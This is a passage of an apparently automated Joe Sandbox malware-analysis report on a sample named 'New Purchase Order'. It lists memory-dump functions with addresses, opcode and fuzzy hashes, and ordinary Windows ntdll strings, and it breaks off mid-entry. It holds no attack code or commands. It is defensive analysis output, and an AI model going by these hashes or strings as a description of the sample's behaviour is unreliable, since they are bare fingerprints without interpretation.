                                                          Function 01732C60 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 066c8f22bbc4baea0bb3b3ec86f7453022dd7d4577e09d32753768db8dfc27b3
                                                          • Instruction ID: d76a1a8da3c719f67c8f6e1b3e4b86ff13c981ae0d736e18793479f27831e899
                                                          • Opcode Fuzzy Hash: 066c8f22bbc4baea0bb3b3ec86f7453022dd7d4577e09d32753768db8dfc27b3
                                                          • Instruction Fuzzy Hash: AA90023130540C43D20071984404B46400597E0301F55C026A0124664DC755CA517622
                                                          Function 01732CF0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1bc58cb3150a27fca3051bde13f70cd2acead8c957c9f384748767d6e28ff943
                                                          • Instruction ID: 0d141389eadc913e4e0f9c0bc6235d7e5f7638cbb11b49a3ed63dfda429c22c8
                                                          • Opcode Fuzzy Hash: 1bc58cb3150a27fca3051bde13f70cd2acead8c957c9f384748767d6e28ff943
                                                          • Instruction Fuzzy Hash: EE90023130540803D20071985508707400597D0201F55D421A0424568DD7968A516222
                                                          Function 01732CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b702442ed5c13137595527b5bf22f13d9f4f49e0ef3dc9554fce9ae552e7f798
                                                          • Instruction ID: 9f45c914eaae3bb91d335adc468eed69ae7cc6069cdc7e3fda4e55ff87063507
                                                          • Opcode Fuzzy Hash: b702442ed5c13137595527b5bf22f13d9f4f49e0ef3dc9554fce9ae552e7f798
                                                          • Instruction Fuzzy Hash: F490022170940803D24071985418706401597D0201F55D021A0024564DC7998B5567A2
                                                          Function 01732CA0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 469c2a0cbd00e589495a16c66909cbb5806a13ff1443677b26ebd6d3bfc2e2a6
                                                          • Instruction ID: e8cf37417e27529ae8ccfd2439a8d6de6100c2c114baaa393dd8fcd83468a6d6
                                                          • Opcode Fuzzy Hash: 469c2a0cbd00e589495a16c66909cbb5806a13ff1443677b26ebd6d3bfc2e2a6
                                                          • Instruction Fuzzy Hash: C190023130540803D20075D85408646400597E0301F55D021A5024565EC7A58A916232
                                                          Function 01732F60 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1467d48e27021afc3556ef2c30cdcfbe60f1c4944e05df9889dcf44852d6d45d
                                                          • Instruction ID: 3fc60f8eb5db5b0950db82fdd3fe9b4422182f67438a47535e52e0fad637511b
                                                          • Opcode Fuzzy Hash: 1467d48e27021afc3556ef2c30cdcfbe60f1c4944e05df9889dcf44852d6d45d
                                                          • Instruction Fuzzy Hash: 1990026131540443D20471984404706404597E1201F55C022A2154564CC7698E615226
                                                          Function 01732F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1198656db12a40955e6c71a2602a5664c6c06608250fe6745d44c3ec92e4cb30
                                                          • Instruction ID: 29f5177e9ffa6143f6cf90b696cff609f0a3708b512150e8dd1a35b2fa414f70
                                                          • Opcode Fuzzy Hash: 1198656db12a40955e6c71a2602a5664c6c06608250fe6745d44c3ec92e4cb30
                                                          • Instruction Fuzzy Hash: 6C90026134540843D20071984414B064005D7E1301F55C025E1064564DC759CE526227
                                                          Function 01732FE0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7970d94e705fd22945eb9fb726dbe981038814a8ac788960bb8a114eb412982f
                                                          • Instruction ID: 90de6ef73de192c5aae0fe33eeb7a4103ba32579352231cda8c6cd4d6660067c
                                                          • Opcode Fuzzy Hash: 7970d94e705fd22945eb9fb726dbe981038814a8ac788960bb8a114eb412982f
                                                          • Instruction Fuzzy Hash: 81900221315C0443D30075A84C14B07400597D0303F55C125A0154564CCB558A615622
                                                          Function 01732FB0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4514e39209063d66d81f1228c4a2532682a2db880102cbca80af411f7a753663
                                                          • Instruction ID: 545ff41f2926fe082e6de84647d94539ce6d7d1232b996b8b8e4e4b16d4a8b91
                                                          • Opcode Fuzzy Hash: 4514e39209063d66d81f1228c4a2532682a2db880102cbca80af411f7a753663
                                                          • Instruction Fuzzy Hash: 9090022170540443424071A888449068005BBE1211755C131A0998560DC7998A655766
                                                          Function 01732FA0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 64a4dfa7b38c03e5c746f39e77af33c78a8dc610abfd48a3c6cd82acd62610cd
                                                          • Instruction ID: d66848de1e971a683feb7b5bc4928a3f43a650a82f27e8e33e25fa0c23e49eab
                                                          • Opcode Fuzzy Hash: 64a4dfa7b38c03e5c746f39e77af33c78a8dc610abfd48a3c6cd82acd62610cd
                                                          • Instruction Fuzzy Hash: B990023130580803D20071984808747400597D0302F55C021A5164565EC7A5CA916632
                                                          Function 01732F90 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bee44b7823489ece716e34ae1cff7ee1d7233628267f043da8244ad6913e7933
                                                          • Instruction ID: 52010935e9b89d050361ea3c8582d5550d294cd9162f7b519de89b0dd6fd334a
                                                          • Opcode Fuzzy Hash: bee44b7823489ece716e34ae1cff7ee1d7233628267f043da8244ad6913e7933
                                                          • Instruction Fuzzy Hash: 4B90023130580803D2007198481470B400597D0302F55C021A1164565DC7658A516672
                                                          Function 01732E30 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 393b4300960c4fbc1b0afaffad095e2af09c491ef4673d0a6f863ac0c3190037
                                                          • Instruction ID: b7ce53f738e841fffc7e9f4ceed81ad4acb77b9a60dfedd03cffbe85b2a9f596
                                                          • Opcode Fuzzy Hash: 393b4300960c4fbc1b0afaffad095e2af09c491ef4673d0a6f863ac0c3190037
                                                          • Instruction Fuzzy Hash: C090022130540803D202719844146064009D7D1345F95C022E1424565DC7658B53A233
                                                          Function 01732EE0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d2fa1da1e8bc68de06314b07aa1813c74e419ef32484c7b506e63656be415802
                                                          • Instruction ID: 9bf6b7026c5b8d8cb944928ce6313f05f0ddba2f44ab8512efe4b5a3062151b3
                                                          • Opcode Fuzzy Hash: d2fa1da1e8bc68de06314b07aa1813c74e419ef32484c7b506e63656be415802
                                                          • Instruction Fuzzy Hash: AC90026130580803D24075984804607400597D0302F55C021A2064565ECB698E516236
                                                          Function 01732EA0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1682dde9804cd215d061ee58b5b97850a3a8a0e9e46333abb358c0acf1a1dae1
                                                          • Instruction ID: a6e3f4cf5dcf63cd5b34932f8c26289d7f12e208fbd55d4068d06746381b6e47
                                                          • Opcode Fuzzy Hash: 1682dde9804cd215d061ee58b5b97850a3a8a0e9e46333abb358c0acf1a1dae1
                                                          • Instruction Fuzzy Hash: 6190027130540803D24071984404746400597D0301F55C021A5064564EC7998FD56766
                                                          Function 01732E80 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e9ef53fe902c7f5e61712ee44ac71fcf3503c1068c0c934bf9a97f78671b32c4
                                                          • Instruction ID: e45309f6609a2e8a0f8f384f534b45902e3be6cc4d0cb8e36f7020ed73055c68
                                                          • Opcode Fuzzy Hash: e9ef53fe902c7f5e61712ee44ac71fcf3503c1068c0c934bf9a97f78671b32c4
                                                          • Instruction Fuzzy Hash: 9990022170540903D20171984404616400A97D0241F95C032A1024565ECB658B92A232
                                                          Function 01733010 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8d2a63453ab0733ca45ccf01b571e5bdefd7d86dcf583200b87d2f4e869b2e42
                                                          • Instruction ID: a6b7df6a162bfb1cd599564be90253b2029cb61a0545d6115f8b7fd5e784cf39
                                                          • Opcode Fuzzy Hash: 8d2a63453ab0733ca45ccf01b571e5bdefd7d86dcf583200b87d2f4e869b2e42
                                                          • Instruction Fuzzy Hash: D790022130584843D24072984804B0F810597E1202F95C029A4156564CCB558A555722
                                                          Function 01733090 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6a36f872f034ce688d36c1c08f3a01c55c4f54de8bda724e75ec6f7703fae314
                                                          • Instruction ID: 68a9348bafb78aaa6edbbf5d443095747edebd1934b5d1813c92ffa5eaac0b92
                                                          • Opcode Fuzzy Hash: 6a36f872f034ce688d36c1c08f3a01c55c4f54de8bda724e75ec6f7703fae314
                                                          • Instruction Fuzzy Hash: B590022134540C03D240719884147074006D7D0601F55C021A0024564DC7568B6567B2
                                                          Function 017339B0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f0e8bbab788ea23d0f4d0482305ac9163b2445c3976e4c78a97bb6b815ebfc80
                                                          • Instruction ID: cc859965ede34ad54d3ba30571b2d0bb7e1207a35c08457ec92c8fb17affa12b
                                                          • Opcode Fuzzy Hash: f0e8bbab788ea23d0f4d0482305ac9163b2445c3976e4c78a97bb6b815ebfc80
                                                          • Instruction Fuzzy Hash: 1B90022134945503D250719C44046168005B7E0201F55C031A08145A4DC7958A556322
                                                          Function 01733D70 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 705be1b08604acf62a251022c3cef34240be93015d05b190e8fea8c61e08e59b
                                                          • Instruction ID: 8699034c206e007c5cfc7120cdfaafcb607461e99e245ea48b0f82990b92f29f
                                                          • Opcode Fuzzy Hash: 705be1b08604acf62a251022c3cef34240be93015d05b190e8fea8c61e08e59b
                                                          • Instruction Fuzzy Hash: 3590023530540803D61071985804646404697D0301F55D421A0424568DC7948AA1A222
                                                          Function 01733D10 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4b3ee4e8beadda77bc035d228b08f9e75320a723317a7d129448e08eb8e7ddbb
                                                          • Instruction ID: b1e9fe7396c79fadaa418fe8a34e5798afd44c5ba45d1148fafc308abbf5f412
                                                          • Opcode Fuzzy Hash: 4b3ee4e8beadda77bc035d228b08f9e75320a723317a7d129448e08eb8e7ddbb
                                                          • Instruction Fuzzy Hash: B490023130640543964072985804A4E810597E1302B95D425A0015564CCB548A615322
                                                          Function 01732C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction ID: 5458fe5c3d6cad9078ebc9290404c2c1861b7dd742c6542a5fa5b47624fc5926
                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction Fuzzy Hash:
                                                          Function 01732890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: de894b348065f53fbcefb21d01e061253cb557ba8caeb3545d987f253463647b
                                                          • Instruction ID: 800a3a6db390d63e7dc68dbaedeffff0ec81f123a197ee87a42785880f46aaa9
                                                          • Opcode Fuzzy Hash: de894b348065f53fbcefb21d01e061253cb557ba8caeb3545d987f253463647b
                                                          • Instruction Fuzzy Hash: 5351D6B6A00156BFDB11DF9C8C909BEFBB8BB882407148269F565E7647D734DE408BA0
                                                          Function 017A2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: 157b9dc095430a5ff4c791e3294f3a26b30fe20a8e78c77b0a1fb278028234b7
                                                          • Instruction ID: b6379ad8e97c1cd207f514ce8f07b59e60b90a74dc772aff0ac3331935a74a9a
                                                          • Opcode Fuzzy Hash: 157b9dc095430a5ff4c791e3294f3a26b30fe20a8e78c77b0a1fb278028234b7
                                                          • Instruction Fuzzy Hash: 1E51F671A04645AFCB30DF5CCC9097FF7F9EB84200B948599E5D6C7642E674DE008760
                                                          Function 01727630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017646FC
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01764787
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01764742
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01764725
                                                          • ExecuteOptions, xrefs: 017646A0
                                                          • Execute=1, xrefs: 01764713
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01764655
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: 2158142b80671288d29040f5da06b1323456a40f4a03a15e320a6e6450c2695f
                                                          • Instruction ID: e96d767a8b899907ae2f00463144b6b81c3558902b63ad021ea2d5a86a67b199
                                                          • Opcode Fuzzy Hash: 2158142b80671288d29040f5da06b1323456a40f4a03a15e320a6e6450c2695f
                                                          • Instruction Fuzzy Hash: 8F511E31A0022A7AEF25EB69DD89FBDF7A8EF25300F1400DDD606A7191D7719E468F50
                                                          Function 017C6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                          • Instruction ID: 869800d9bda20fdbcdfa5e371340e86cb3078559a8fed1f2dea73da7bd3756aa
                                                          • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                          • Instruction Fuzzy Hash: C9020471508342AFD709CF28C494A6BFBE5EFD8B00F14892DFA854B265DB31E945CB52
                                                          Function 0173B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction ID: 9d5b9c08e7ab78790076128a947d3fd3bbc88ec4af0ab4bfc323abb46e3c7724
                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction Fuzzy Hash: DA819070E452499EEF2A8E6CC8917FEFBB1EFC5320F18415AD861A7293C7349941CB51
                                                          Function 017A20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$[$]:%u
                                                          • API String ID: 48624451-2819853543
                                                          • Opcode ID: f815842fa241b165fb7670df7c73732aec7a8bc46ce50225876310a6e97466a6
                                                          • Instruction ID: 9c7dd1e33ed6470ebf0298abc2c1e9875fb0bd6c4ea3361beda56c7849235a11
                                                          • Opcode Fuzzy Hash: f815842fa241b165fb7670df7c73732aec7a8bc46ce50225876310a6e97466a6
                                                          • Instruction Fuzzy Hash: B821777AA00119ABDB10DF79CC44AFEFBF9EF94650F540216FA05D3206E730E9018BA1
                                                          Function 0171F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017602BD
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017602E7
                                                          • RTL: Re-Waiting, xrefs: 0176031E
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          • Opcode ID: c4c9cda5eaed36cc233a00233c2d971913c2500ae61a85509a62e74212a99185
                                                          • Instruction ID: 72a067fdf0748f04dd052f461e2eba7da2c1580e96c9d3fab8a74008355874f6
                                                          • Opcode Fuzzy Hash: c4c9cda5eaed36cc233a00233c2d971913c2500ae61a85509a62e74212a99185
                                                          • Instruction Fuzzy Hash: CEE18C706087429FD725CF2CC884B2AFBE4AF88324F144A5DF9A58B2E5D774D949CB42
                                                          Function 0172BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01767B7F
                                                          • RTL: Resource at %p, xrefs: 01767B8E
                                                          • RTL: Re-Waiting, xrefs: 01767BAC
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 0-871070163
                                                          • Opcode ID: b1267258c01e6f5671863b00856478d4a952d2c7c7864fc6d47b58f4e4430d28
                                                          • Instruction ID: fd535d57a396cdd066baea89b0aeb971838cb6d95a89121cef8051a773078004
                                                          • Opcode Fuzzy Hash: b1267258c01e6f5671863b00856478d4a952d2c7c7864fc6d47b58f4e4430d28
                                                          • Instruction Fuzzy Hash: 5041EF317047029FDB24DE29C840F6AF7E5EF98720F000A2DE95A9B680DB31E9068B91
                                                          Function 0172B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0176728C
                                                          Strings
                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01767294
                                                          • RTL: Resource at %p, xrefs: 017672A3
                                                          • RTL: Re-Waiting, xrefs: 017672C1
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-605551621
                                                          • Opcode ID: e0669ae0fc4342c5d498a1609ee04e4b1339408163674b90f46c54fcbbd362de
                                                          • Instruction ID: b81eaf9de6426153aac1b8bda2aec32b9b42d467eeb327fe84a85009dc145e27
                                                          • Opcode Fuzzy Hash: e0669ae0fc4342c5d498a1609ee04e4b1339408163674b90f46c54fcbbd362de
                                                          • Instruction Fuzzy Hash: AF41FF31608216AFDB24DE29CC81B6AF7A9FB94754F100619FD55AB240DB20F8428BD1
                                                          Function 017A2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
